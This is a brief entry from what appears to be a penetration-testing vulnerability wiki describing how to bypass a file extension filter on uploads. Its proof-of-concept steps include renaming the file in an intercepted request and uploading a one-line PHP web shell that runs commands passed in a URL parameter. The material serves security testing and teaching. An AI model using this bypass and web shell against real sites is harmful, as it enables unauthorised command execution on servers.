Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V11 - Business Logic

Unrestricted File Upload - File Extension Filter Bypass

POC

  • Upload an image file
  • Intercept the request with Burp
  • Change filename="test.php.jpg" to filename="test.php"
  • Keep the Content-Type: image/jpeg
  • Include the following content in the file <?php system($_GET['cmd'])?>
  • Try to see if this can lead to command execution with appending ?cmd=ls to the image URL

Impact

Low-Medium

Likelihood

Low-Medium